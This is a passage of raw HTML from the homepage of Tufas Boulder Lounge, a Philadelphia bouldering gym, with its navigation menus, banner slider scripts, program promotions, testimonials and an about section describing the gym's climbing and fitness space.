Philadelphia, PA 19122</span></span></a></div></div><div class="sc_layouts_item"><div id="sc_layouts_iconed_text_1277452255" class="sc_layouts_iconed_text"><a href="tel:215-360-3999" class="sc_layouts_item_link sc_layouts_iconed_text_link"><span class="sc_layouts_item_icon sc_layouts_iconed_text_icon icon-phone"></span><span class="sc_layouts_item_details sc_layouts_iconed_text_details"><span class="sc_layouts_item_details_line2 sc_layouts_iconed_text_line2">215-360-3999</span></span></a></div></div><div class="sc_layouts_item sc_layouts_hide_on_mobile"><div id="sc_socials_1256297266" class="sc_socials hide_on_mobile sc_socials_default sc_align_right"><div class="socials_wrap"><a target="_blank" href="mailto:[email protected]" class="social_item social_item_style_icons social_item_type_icons"><span class="social_icon social_mail"><span class="icon-mail"></span></span></a><a target="_blank" href="https://www.facebook.com/Tufas-Boulder-Lounge-441113616306649/" class="social_item social_item_style_icons social_item_type_icons"><span class="social_icon social_facebook"><span class="icon-facebook"></span></span></a><a target="_blank" href="https://www.instagram.com/tufas_boulder_lounge/" class="social_item social_item_style_icons social_item_type_icons"><span class="social_icon social_instagramm"><span class="icon-instagramm"></span></span></a></div></div></div></div></div></div></div></div></div></div></div></div></div><div class="vc_row wpb_row vc_row-fluid header-2 sc_layouts_row sc_layouts_row_type_compact sc_layouts_row_fixed"><div class="wpb_column vc_column_container vc_col-sm-12 sc_layouts_column_icons_position_left"><div class="vc_column-inner "><div class="wpb_wrapper"><div id="sc_content_769496018" class="sc_content color_style_default sc_content_default sc_content_width_1_1 sc_float_center"><div class="sc_content_container"><div class="vc_row wpb_row vc_inner vc_row-fluid vc_row-o-equal-height vc_row-o-content-middle vc_row-flex"><div class="logo_default wpb_column vc_column_container vc_col-sm-3 sc_layouts_column_icons_position_left"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="sc_layouts_item"><a href="#" id="sc_layouts_logo_20669781" class="sc_layouts_logo sc_layouts_logo_default"><img class="logo_image" src="https://tufasboulderlounge.com/wp-content/uploads/2018/03/logo-white.png" alt="" width="545" height="253"></a></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-9 sc_layouts_column sc_layouts_column_align_right sc_layouts_column_icons_position_left"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="sc_layouts_item"><nav class="sc_layouts_menu sc_layouts_menu_default menu_hover_slide_line hide_on_mobile" id="sc_layouts_menu_58344642" data-animation-in="fadeInUpSmall" data-animation-out="fadeOutDownSmall" ><ul id="menu-main-menu" class="sc_layouts_menu_nav"><li id="menu-item-1143" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1143"><a href="https://tufasboulderlounge.com/about/"><span>About</span></a><ul class="sub-menu"><li id="menu-item-1701" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1701"><a href="https://tufasboulderlounge.com/about/"><span>About Us</span></a></li><li id="menu-item-1668" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1668"><a href="https://tufasboulderlounge.com/policy-rules/"><span>Policy &#038; Rules</span></a></li></ul></li><li id="menu-item-1260" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1260"><a href="https://tufasboulderlounge.com/pricing/"><span>Pricing</span></a></li><li id="menu-item-1826" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1826"><a href="https://tufasboulderlounge.com/youth-climbing/"><span>Youth</span></a><ul class="sub-menu"><li id="menu-item-1829" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1829"><a href="https://tufasboulderlounge.com/junior-climbing-club/"><span>Junior Climbing Club</span></a></li><li id="menu-item-1828" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1828"><a href="https://tufasboulderlounge.com/recreational-climbing-club/"><span>Recreational Climbing Club</span></a></li><li id="menu-item-1827" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1827"><a href="https://tufasboulderlounge.com/teen-climbing-club/"><span>Teen Climbing Club</span></a></li></ul></li><li id="menu-item-1882" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1882"><a href="https://tufasboulderlounge.com/classes/"><span>Classes</span></a><ul class="sub-menu"><li id="menu-item-1844" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1844"><a href="https://tufasboulderlounge.com/intro-to-bouldering/"><span>Intro To Bouldering</span></a></li><li id="menu-item-2288" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2288"><a href="https://tufasboulderlounge.com/women-rock/"><span>Women Who Rock</span></a></li><li id="menu-item-1843" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1843"><a href="https://tufasboulderlounge.com/yoga/"><span>Yoga</span></a></li></ul></li><li id="menu-item-1783" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1783"><a href="https://tufasboulderlounge.com/fitness/"><span>Fitness</span></a><ul class="sub-menu"><li id="menu-item-1786" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1786"><a href="https://tufasboulderlounge.com/intentional-conditioning/"><span>Intentional Conditioning</span></a></li><li id="menu-item-1785" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1785"><a href="https://tufasboulderlounge.com/integrated-strength/"><span>Integrated Strength</span></a></li><li id="menu-item-1784" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1784"><a href="https://tufasboulderlounge.com/personal-training/"><span>Personal Training</span></a></li><li id="menu-item-1867" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1867"><a href="https://tufasboulderlounge.com/workshops/"><span>Workshops</span></a></li></ul></li><li id="menu-item-2311" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2311"><a href="https://tufasboulderlounge.com/boulders/"><span>Boulders</span></a></li><li id="menu-item-1185" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1185"><a href="https://tufasboulderlounge.com/contact/"><span>Contact</span></a></li></ul></nav><div class="sc_layouts_iconed_text sc_layouts_menu_mobile_button"> <a class="sc_layouts_item_link sc_layouts_iconed_text_link" href="#"> <span class="sc_layouts_item_icon sc_layouts_iconed_text_icon trx_addons_icon-menu"></span> </a></div></div><div class="sc_layouts_item sc_layouts_hide_on_mobile"><a href="/waiver" id="sc_button_2012914074" class="sc_button hide_on_mobile color_style_link2 sc_button_default sc_button_size_normal sc_button_icon_left"><span class="sc_button_text"><span class="sc_button_title">Waiver</span></span></a></div></div></div></div></div></div></div></div></div></div></div><div class="vc_row wpb_row vc_row-fluid header-3 vc_custom_1547497703978 vc_row-has-fill sc_layouts_hide_on_frontpage"><div class="wpb_column vc_column_container vc_col-sm-12 sc_layouts_column_icons_position_left"><div class="vc_column-inner vc_custom_1536955050993"><div class="wpb_wrapper"><div class="vc_empty_space" style="height: 2em" ><span class="vc_empty_space_inner"></span></div><div class="vc_empty_space" style="height: 5.25em" ><span class="vc_empty_space_inner"></span></div><div id="sc_content_1820408536" class="sc_content color_style_default sc_content_default sc_float_center"><div class="sc_content_container"><div class="sc_layouts_item"><div id="sc_layouts_title_156276954" class="sc_layouts_title sc_align_center with_content"><div class="sc_layouts_title_content"><div class="sc_layouts_title_title"><h1 class="sc_layouts_title_caption">Home</h1></div></div></div></div></div></div><div class="vc_empty_space" style="height: 5.25em" ><span class="vc_empty_space_inner"></span></div><div class="vc_empty_space" style="height: 2em" ><span class="vc_empty_space_inner"></span></div></div></div></div></div></header><div class="menu_mobile_overlay"></div><div class="menu_mobile menu_mobile_fullscreen scheme_dark"><div class="menu_mobile_inner"> <a class="menu_mobile_close icon-cancel"></a><a class="sc_layouts_logo" href="#"><span class="logo_text">Tufas Boulder Lounge</span></a><nav itemscope itemtype="http://schema.org/SiteNavigationElement" class="menu_mobile_nav_area"><ul id="menu_mobile" class=" menu_mobile_nav"><li id="menu_mobile-item-1277" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-346 current_page_item menu-item-1277"><a href="https://tufasboulderlounge.com/" aria-current="page"><span>Home</span></a></li><li id="menu_mobile-item-1276" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1276"><a href="https://tufasboulderlounge.com/about/"><span>About</span></a><ul class="sub-menu"><li id="menu_mobile-item-1712" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1712"><a href="https://tufasboulderlounge.com/about/"><span>About Us</span></a></li><li id="menu_mobile-item-1710" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1710"><a href="https://tufasboulderlounge.com/policy-rules/"><span>Policy &#038; Rules</span></a></li></ul></li><li id="menu_mobile-item-1274" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1274"><a href="https://tufasboulderlounge.com/pricing/"><span>Pricing</span></a></li><li id="menu_mobile-item-1822" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1822"><a href="https://tufasboulderlounge.com/youth-climbing/"><span>Youth</span></a><ul class="sub-menu"><li id="menu_mobile-item-1825" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1825"><a href="https://tufasboulderlounge.com/junior-climbing-club/"><span>Junior Climbing Club</span></a></li><li id="menu_mobile-item-1824" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1824"><a href="https://tufasboulderlounge.com/recreational-climbing-club/"><span>Recreational Climbing Club</span></a></li><li id="menu_mobile-item-1823" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1823"><a href="https://tufasboulderlounge.com/teen-climbing-club/"><span>Teen Climbing Club</span></a></li></ul></li><li id="menu_mobile-item-1881" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1881"><a href="https://tufasboulderlounge.com/classes/"><span>Classes</span></a><ul class="sub-menu"><li id="menu_mobile-item-1842" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1842"><a href="https://tufasboulderlounge.com/intro-to-bouldering/"><span>Intro To Bouldering</span></a></li><li id="menu_mobile-item-2289" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2289"><a href="https://tufasboulderlounge.com/women-rock/"><span>Women Who Rock</span></a></li><li id="menu_mobile-item-1841" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1841"><a href="https://tufasboulderlounge.com/yoga/"><span>Yoga</span></a></li></ul></li><li id="menu_mobile-item-1790" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1790"><a href="https://tufasboulderlounge.com/fitness/"><span>Fitness</span></a><ul class="sub-menu"><li id="menu_mobile-item-1789" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1789"><a href="https://tufasboulderlounge.com/intentional-conditioning/"><span>Intentional Conditioning</span></a></li><li id="menu_mobile-item-1788" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1788"><a href="https://tufasboulderlounge.com/integrated-strength/"><span>Integrated Strength</span></a></li><li id="menu_mobile-item-1787" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1787"><a href="https://tufasboulderlounge.com/personal-training/"><span>Personal Training</span></a></li><li id="menu_mobile-item-1868" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1868"><a href="https://tufasboulderlounge.com/workshops/"><span>Workshops</span></a></li></ul></li><li id="menu_mobile-item-2312" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2312"><a href="https://tufasboulderlounge.com/boulders/"><span>Boulders</span></a></li><li id="menu_mobile-item-1510" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1510"><a href="https://tufasboulderlounge.com/blog/"><span>Blog</span></a></li><li id="menu_mobile-item-1275" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1275"><a href="https://tufasboulderlounge.com/contact/"><span>Contact</span></a></li><li id="menu_mobile-item-1713" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1713"><a href="https://tufasboulderlounge.com/waiver/"><span>Waiver</span></a></li></ul></nav></div></div><div class="page_content_wrap scheme_default"><div class="content_wrap"><div class="content"><article id="post-346" class="post_item_single post_type_page post-346 page type-page status-publish hentry"><div class="post_content entry-content"><div data-vc-full-width="true" data-vc-full-width-init="false" data-vc-stretch-content="true" class="vc_row wpb_row vc_row-fluid vc_custom_1546097234721 vc_row-has-fill vc_row-no-padding"><div class="wpb_column vc_column_container vc_col-sm-12 sc_layouts_column_icons_position_left"><div class="vc_column-inner vc_custom_1536969178652"><div class="wpb_wrapper"><div class="vc_row wpb_row vc_inner vc_row-fluid"></div><div class="wpb_column vc_column_container vc_col-sm-12 sc_layouts_column_icons_position_left"><div class="vc_column-inner "><div class="wpb_wrapper"></div></div></div><div class="vc_row wpb_row vc_inner vc_row-fluid vc_custom_1546014589923 vc_row-has-fill"></div><div class="wpb_column vc_column_container vc_col-sm-12 sc_layouts_column_icons_position_left"><div class="vc_column-inner "><div class="wpb_wrapper"></div></div></div><div class="wpb_revslider_element wpb_content_element home_desktop_slider"><div id="rev_slider_1_1_wrapper" class="rev_slider_wrapper fullwidthbanner-container" data-source="gallery" style="margin:0px auto;background:transparent;padding:0px;margin-top:0px;margin-bottom:0px;"><div id="rev_slider_1_1" class="rev_slider fullwidthabanner tp-overflow-hidden" style="display:none;" data-version="5.4.5.1"><ul><li data-index="rs-21" data-transition="notransition" data-slotamount="default" data-hideafterloop="0" data-hideslideonmobile="off" data-easein="default" data-easeout="default" data-masterspeed="default" data-thumb="https://tufasboulderlounge.com/wp-content/uploads/2019/02/climbersClimbing-1-100x50.jpg" data-rotate="0" data-saveperformance="off" data-title="Slide" data-param1="" data-param2="" data-param3="" data-param4="" data-param5="" data-param6="" data-param7="" data-param8="" data-param9="" data-param10="" data-description=""> <img src="https://tufasboulderlounge.com/wp-content/plugins/revslider/admin/assets/images/dummy.png" alt="" title="climbersClimbing_small" width="3840" height="1380" data-lazyload="https://tufasboulderlounge.com/wp-content/uploads/2019/02/climbersClimbing-1.jpg" data-bgposition="center center" data-bgfit="cover" data-bgrepeat="no-repeat" class="rev-slidebg" data-no-retina></li></ul><div class="tp-bannertimer tp-bottom" style="visibility: hidden !important;"></div></div> <script>var htmlDiv = document.getElementById("rs-plugin-settings-inline-css"); var htmlDivCss=""; if(htmlDiv) { htmlDiv.innerHTML = htmlDiv.innerHTML + htmlDivCss; }else{ var htmlDiv = document.createElement("div"); htmlDiv.innerHTML = ""; document.getElementsByTagName("head")[0].appendChild(htmlDiv.childNodes[0]); }</script> <script type="text/javascript">setREVStartSize({c: jQuery('#rev_slider_1_1'), gridwidth: [1170], gridheight: [900], sliderLayout: 'fullwidth'}); var revapi1, tpj=jQuery; tpj(document).ready(function() { if(tpj("#rev_slider_1_1").revolution == undefined){ revslider_showDoubleJqueryError("#rev_slider_1_1"); }else{ revapi1 = tpj("#rev_slider_1_1").show().revolution({ sliderType:"standard", jsFileLocation:"//tufasboulderlounge.com/wp-content/plugins/revslider/public/assets/js/", sliderLayout:"fullwidth", dottedOverlay:"none", delay:9000, navigation: { onHoverStop:"off", }, visibilityLevels:[1240,1024,778,480], gridwidth:1170, gridheight:900, lazyType:"all", shadow:0, spinner:"spinner0", stopLoop:"off", stopAfterLoops:-1, stopAtSlide:-1, shuffle:"off", autoHeight:"off", disableProgressBar:"on", hideThumbsOnMobile:"off", hideSliderAtLimit:0, hideCaptionAtLimit:770, hideAllCaptionAtLilmit:0, debugMode:false, fallbacks: { simplifyAll:"off", nextSlideOnWindowFocus:"off", disableFocusListener:false, } }); } }); /*ready*/</script> </div></div><div class="wpb_revslider_element wpb_content_element home_mobile_slider"><div id="rev_slider_5_2_wrapper" class="rev_slider_wrapper fullwidthbanner-container" data-source="gallery" style="margin:0px auto;background:transparent;padding:0px;margin-top:0px;margin-bottom:0px;"><div id="rev_slider_5_2" class="rev_slider fullwidthabanner" style="display:none;" data-version="5.4.5.1"><ul><li data-index="rs-13" data-transition="notransition" data-slotamount="default" data-hideafterloop="0" data-hideslideonmobile="off" data-easein="default" data-easeout="default" data-masterspeed="default" data-thumb="https://tufasboulderlounge.com/wp-content/uploads/2019/01/climbersClimbing-100x50.jpg" data-rotate="0" data-saveperformance="off" data-title="Slide" data-param1="" data-param2="" data-param3="" data-param4="" data-param5="" data-param6="" data-param7="" data-param8="" data-param9="" data-param10="" data-description=""> <img src="https://tufasboulderlounge.com/wp-content/uploads/2019/01/climbersClimbing.jpg" alt="" title="climbersClimbing" width="3840" height="1380" data-bgposition="center center" data-bgfit="cover" data-bgrepeat="no-repeat" class="rev-slidebg" data-no-retina></li></ul><div class="tp-bannertimer tp-bottom" style="visibility: hidden !important;"></div></div> <script>var htmlDiv = document.getElementById("rs-plugin-settings-inline-css"); var htmlDivCss=""; if(htmlDiv) { htmlDiv.innerHTML = htmlDiv.innerHTML + htmlDivCss; }else{ var htmlDiv = document.createElement("div"); htmlDiv.innerHTML = ""; document.getElementsByTagName("head")[0].appendChild(htmlDiv.childNodes[0]); }</script> <script type="text/javascript">setREVStartSize({c: jQuery('#rev_slider_5_2'), gridwidth: [1170], gridheight: [900], sliderLayout: 'fullwidth'}); var revapi5, tpj=jQuery; tpj(document).ready(function() { if(tpj("#rev_slider_5_2").revolution == undefined){ revslider_showDoubleJqueryError("#rev_slider_5_2"); }else{ revapi5 = tpj("#rev_slider_5_2").show().revolution({ sliderType:"standard", jsFileLocation:"//tufasboulderlounge.com/wp-content/plugins/revslider/public/assets/js/", sliderLayout:"fullwidth", dottedOverlay:"none", delay:9000, navigation: { onHoverStop:"off", }, visibilityLevels:[1240,1024,778,480], gridwidth:1170, gridheight:900, lazyType:"none", shadow:0, spinner:"spinner0", stopLoop:"off", stopAfterLoops:-1, stopAtSlide:-1, shuffle:"off", autoHeight:"off", disableProgressBar:"on", hideThumbsOnMobile:"off", hideSliderAtLimit:0, hideCaptionAtLimit:770, hideAllCaptionAtLilmit:0, debugMode:false, fallbacks: { simplifyAll:"off", nextSlideOnWindowFocus:"off", disableFocusListener:false, } }); } }); /*ready*/</script> <script>var htmlDivCss = unescape("%23rev_slider_1_1_forcefullwidth%2C%20%23rev_slider_1_1_wrapper%20%7Bheight%3A%20300px%3B%20max-height%3A%20300px%3B%7D"); var htmlDiv = document.getElementById('rs-plugin-settings-inline-css'); if(htmlDiv) { htmlDiv.innerHTML = htmlDiv.innerHTML + htmlDivCss; } else{ var htmlDiv = document.createElement('div'); htmlDiv.innerHTML = ''; document.getElementsByTagName('head')[0].appendChild(htmlDiv.childNodes[0]); }</script></div></div></div></div></div></div><div class="vc_row-full-width vc_clearfix"></div><div class="vc_row wpb_row vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12 sc_layouts_column_icons_position_left"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="sc_layouts sc_layouts_default sc_layouts_274"><div data-vc-full-width="true" data-vc-full-width-init="false" data-vc-stretch-content="true" class="vc_row wpb_row vc_row-fluid vc_custom_1546887393271 vc_row-has-fill vc_row-no-padding vc_row-o-equal-height vc_row-flex scheme_default"><div class="wpb_column vc_column_container vc_col-sm-4 vc_col-xs-4 sc_layouts_column_icons_position_left"><div class="vc_column-inner "><div class="wpb_wrapper"><div id="sc_content_1669361631" class="sc_content color_style_default sc_content_default sc_float_center sc_align_center sc_padding_small"><div class="sc_content_container"><div class="wpb_text_column wpb_content_element " ><div class="wpb_wrapper"><h4 style="text-align: center;"><span style="color: #ffffff;">Youth Climbing Programs</span></h4></div></div><div class="vc_empty_space height_tiny" style="height: 42px" ><span class="vc_empty_space_inner"></span></div><div class="sc_item_button sc_button_wrap sc_align_center"><a href="https://tufasboulderlounge.com/youth-climbing/" id="sc_button_2112371415" class="sc_button color_style_default sc_button_default vc_custom_1546887709685 sc_button_size_normal sc_button_icon_left"><span class="sc_button_text sc_align_center"><span class="sc_button_title">Enroll Now</span></span></a></div></div></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-4 vc_col-xs-4 sc_layouts_column_icons_position_left"><div class="vc_column-inner "><div class="wpb_wrapper"><div id="sc_content_837041160" class="sc_content color_style_default sc_content_default sc_float_center sc_align_center sc_padding_small"><div class="sc_content_container"><div class="wpb_text_column wpb_content_element " ><div class="wpb_wrapper"><h4 style="text-align: center;"><span style="color: #ffffff;">Intro To Bouldering Class</span></h4></div></div><div class="vc_empty_space height_tiny" style="height: 42px" ><span class="vc_empty_space_inner"></span></div><div class="sc_item_button sc_button_wrap sc_align_center"><a href="https://tufasboulderlounge.com/intro-to-bouldering/" id="sc_button_981027070" class="sc_button color_style_default sc_button_default vc_custom_1545248068110 sc_button_size_normal sc_button_icon_left"><span class="sc_button_text sc_align_center"><span class="sc_button_title">Sign Up</span></span></a></div></div></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-4 vc_col-xs-4 vc_hidden-xs sc_layouts_column_icons_position_left"><div class="vc_column-inner "><div class="wpb_wrapper"><div id="sc_content_836159320" class="sc_content color_style_default sc_content_default sc_float_center sc_align_center sc_padding_small"><div class="sc_content_container"><div class="wpb_text_column wpb_content_element " ><div class="wpb_wrapper"><h4 style="text-align: center;"><span style="color: #ffffff;">Fitness Climbing Program</span></h4></div></div><div class="vc_empty_space height_tiny" style="height: 42px" ><span class="vc_empty_space_inner"></span></div><div class="sc_item_button sc_button_wrap sc_align_center"><a href="https://tufasboulderlounge.com/fitness/" id="sc_button_65161535" class="sc_button color_style_default sc_button_default vc_custom_1545248140527 sc_button_size_normal sc_button_icon_left"><span class="sc_button_text sc_align_center"><span class="sc_button_title">Enroll Now</span></span></a></div></div></div></div></div></div></div><div class="vc_row-full-width vc_clearfix"></div></div></div></div></div></div><div class="vc_row wpb_row vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12 sc_layouts_column_icons_position_left"><div class="vc_column-inner "><div class="wpb_wrapper"><div id="sc_content_1653684855" class="sc_content color_style_default sc_content_default sc_float_center"><div class="sc_content_container"><h2 style="text-align: center" class="vc_custom_heading" >Tufas Boulder Lounge</h2><h5 style="text-align: center" class="vc_custom_heading" >Our mission is to foster a community centered around rock climbing in Philadelphia, with an inclusive space dedicated to climbing, fitness, and collaboration.</h5><div class="sc_testimonials color_style_default sc_testimonials_default"><div class="sc_testimonials_columns_wrap sc_item_columns trx_addons_columns_wrap columns_padding_bottom"><div class="trx_addons_column-1_2"><div class="sc_testimonials_item"><div class="sc_testimonials_item_content"><p><img class="wp-image-2246 alignleft" src="https://tufasboulderlounge.com/wp-content/uploads/2019/01/5-stars.png" alt="" width="333" height="62" srcset="https://tufasboulderlounge.com/wp-content/uploads/2019/01/5-stars.png 882w, https://tufasboulderlounge.com/wp-content/uploads/2019/01/5-stars-300x56.png 300w, https://tufasboulderlounge.com/wp-content/uploads/2019/01/5-stars-768x144.png 768w, https://tufasboulderlounge.com/wp-content/uploads/2019/01/5-stars-370x69.png 370w, https://tufasboulderlounge.com/wp-content/uploads/2019/01/5-stars-835x156.png 835w" sizes="(max-width: 333px) 100vw, 333px" /></p><h5></h5><h5></h5><h5>&#8220;Really creative route-setting. Friendly staff. Super clean facility.&#8221;</h5></div><div class="sc_testimonials_item_author"><div class="sc_testimonials_item_author_data"><h4 class="sc_testimonials_item_author_title">Creative</h4><div class="sc_testimonials_item_author_subtitle"></div></div></div></div></div><div class="trx_addons_column-1_2"><div class="sc_testimonials_item"><div class="sc_testimonials_item_content"><p><img class="wp-image-2246 alignleft" src="https://tufasboulderlounge.com/wp-content/uploads/2019/01/5-stars.png" alt="" width="333" height="62" srcset="https://tufasboulderlounge.com/wp-content/uploads/2019/01/5-stars.png 882w, https://tufasboulderlounge.com/wp-content/uploads/2019/01/5-stars-300x56.png 300w, https://tufasboulderlounge.com/wp-content/uploads/2019/01/5-stars-768x144.png 768w, https://tufasboulderlounge.com/wp-content/uploads/2019/01/5-stars-370x69.png 370w, https://tufasboulderlounge.com/wp-content/uploads/2019/01/5-stars-835x156.png 835w" sizes="(max-width: 333px) 100vw, 333px" /></p><h5>&#8220;Hands down Philly&#8217;s best rock gym. They&#8217;re doing everything right here&#8221;</h5></div><div class="sc_testimonials_item_author"><div class="sc_testimonials_item_author_data"><h4 class="sc_testimonials_item_author_title">Everything Right</h4><div class="sc_testimonials_item_author_subtitle"></div></div></div></div></div></div></div></div></div><div class="vc_empty_space hide_on_mobile hide_on_tablet" style="height: 2em" ><span class="vc_empty_space_inner"></span></div><div class="vc_empty_space" style="height: 1em" ><span class="vc_empty_space_inner"></span></div><div class="vc_row wpb_row vc_inner vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-6 vc_hidden-xs sc_layouts_column_icons_position_left"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="wpb_images_carousel wpb_content_element vc_clearfix"><div class="wpb_wrapper"><div id="vc_images-carousel-1-1557954833" data-ride="vc_carousel" data-wrap="true" style="width: 100%;" data-interval="5000" data-auto-height="yes" data-mode="horizontal" data-partial="false" data-per-view="1" data-hide-on-end="false" class="vc_slide vc_images_carousel"><div class="vc_carousel-inner"><div class="vc_carousel-slideline"><div class="vc_carousel-slideline-inner"><div class="vc_item"><div class="vc_inner"> <img width="1170" height="780" src="https://tufasboulderlounge.com/wp-content/uploads/2018/11/4Z5A2225-1.jpg" class="attachment-full" alt="Rock Climbing in Philadelphia" srcset="https://tufasboulderlounge.com/wp-content/uploads/2018/11/4Z5A2225-1.jpg 1170w, https://tufasboulderlounge.com/wp-content/uploads/2018/11/4Z5A2225-1-300x200.jpg 300w, https://tufasboulderlounge.com/wp-content/uploads/2018/11/4Z5A2225-1-768x512.jpg 768w, https://tufasboulderlounge.com/wp-content/uploads/2018/11/4Z5A2225-1-1024x683.jpg 1024w, https://tufasboulderlounge.com/wp-content/uploads/2018/11/4Z5A2225-1-370x247.jpg 370w, https://tufasboulderlounge.com/wp-content/uploads/2018/11/4Z5A2225-1-835x557.jpg 835w" sizes="(max-width: 1170px) 100vw, 1170px" /></div></div><div class="vc_item"><div class="vc_inner"> <img width="1170" height="749" src="https://tufasboulderlounge.com/wp-content/uploads/2018/11/4Z5A2258-1.jpg" class="attachment-full" alt="Rock Climbing in Philadelphia" srcset="https://tufasboulderlounge.com/wp-content/uploads/2018/11/4Z5A2258-1.jpg 1170w, https://tufasboulderlounge.com/wp-content/uploads/2018/11/4Z5A2258-1-300x192.jpg 300w, https://tufasboulderlounge.com/wp-content/uploads/2018/11/4Z5A2258-1-768x492.jpg 768w, https://tufasboulderlounge.com/wp-content/uploads/2018/11/4Z5A2258-1-1024x655.jpg 1024w, https://tufasboulderlounge.com/wp-content/uploads/2018/11/4Z5A2258-1-370x237.jpg 370w, https://tufasboulderlounge.com/wp-content/uploads/2018/11/4Z5A2258-1-835x534.jpg 835w" sizes="(max-width: 1170px) 100vw, 1170px" /></div></div><div class="vc_item"><div class="vc_inner"> <img width="1170" height="780" src="https://tufasboulderlounge.com/wp-content/uploads/2018/11/Yes4-1.jpg" class="attachment-full" alt="Rock Climbing in Philadelphia" srcset="https://tufasboulderlounge.com/wp-content/uploads/2018/11/Yes4-1.jpg 1170w, https://tufasboulderlounge.com/wp-content/uploads/2018/11/Yes4-1-300x200.jpg 300w, https://tufasboulderlounge.com/wp-content/uploads/2018/11/Yes4-1-768x512.jpg 768w, https://tufasboulderlounge.com/wp-content/uploads/2018/11/Yes4-1-1024x683.jpg 1024w, https://tufasboulderlounge.com/wp-content/uploads/2018/11/Yes4-1-370x247.jpg 370w, https://tufasboulderlounge.com/wp-content/uploads/2018/11/Yes4-1-835x557.jpg 835w" sizes="(max-width: 1170px) 100vw, 1170px" /></div></div></div></div></div></div></div></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-6 sc_layouts_column_icons_position_left"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="wpb_text_column wpb_content_element " ><div class="wpb_wrapper"><h4>Rock Climbing in Philadelphia</h4></div></div><div class="wpb_text_column wpb_content_element " ><div class="wpb_wrapper"><p>Tufas Boulder Lounge came about through the shared vision of three local Philly climbers who knew that the existing community needed more than what was currently available and that the benefits of rock climbing in Philadelphia could be shared with a much larger audience.</p></div></div><div class="vc_empty_space" style="height: 1.5em" ><span class="vc_empty_space_inner"></span></div><div class="wpb_text_column wpb_content_element " ><div class="wpb_wrapper"><div class="wpb_text_column wpb_content_element "><div class="wpb_wrapper"><p>We are thrilled to be able to provide a space for rock climbing in Philadelphia that incorporates everything that we love about the sport and lifestyle of climbing. We have designed over 5,500 sq/ft of climbing terrain with beginner and advanced climbers in mind. In addition there is 1,500 sq/ft of climbing-specific training and general fitness to keep us strong, motivated, and healthy.</p></div></div><div class="wpb_text_column wpb_content_element "><div class="wpb_wrapper"><p>We understand the importance of community, which is why we created multiple lounge areas to provide an environment where trips can be planned and memories can be shared. Now that the approach is over it’s time to start climbing!</p></div></div></div></div><div class="vc_empty_space" style="height: 1.5em" ><span class="vc_empty_space_inner"></span></div> <a href="/about" id="sc_button_57315292" class="sc_button color_style_default sc_button_default about-button sc_button_size_normal sc_button_icon_left"><span class="sc_button_text"><span class="sc_button_title">ABOUT US</span></span></a></div></div></div></div><div class="vc_empty_space" style="height: 2em" ><span class="vc_empty_space_inner"></span></div><div class="vc_empty_space hide_on_mobile hide_on_tablet" style="height: 1.45em" ><span class="vc_empty_space_inner"></span></div></div></div></div></div><div class="vc_row wpb_row vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12 sc_layouts_column_icons_position_left"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="vc_empty_space" style="height: 1em" ><span class="vc_empty_space_inner"></span></div><div class="vc_empty_space hide_on_mobile hide_on_tablet" style="height: 3.5em" ><span class="vc_empty_space_inner"></span></div></div></div></div></div><div class="vc_row wpb_row vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12 sc_layouts_column_icons_position_left"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="wpb_text_column wpb_content_element " ><div class="wpb_wrapper"><h2 style="text-align: center;">Climb With Us</h2></div></div><h5 style="text-align: center" class="vc_custom_heading" >We're more than just a bouldering gym.</h5><div id="sc_services_482171256" 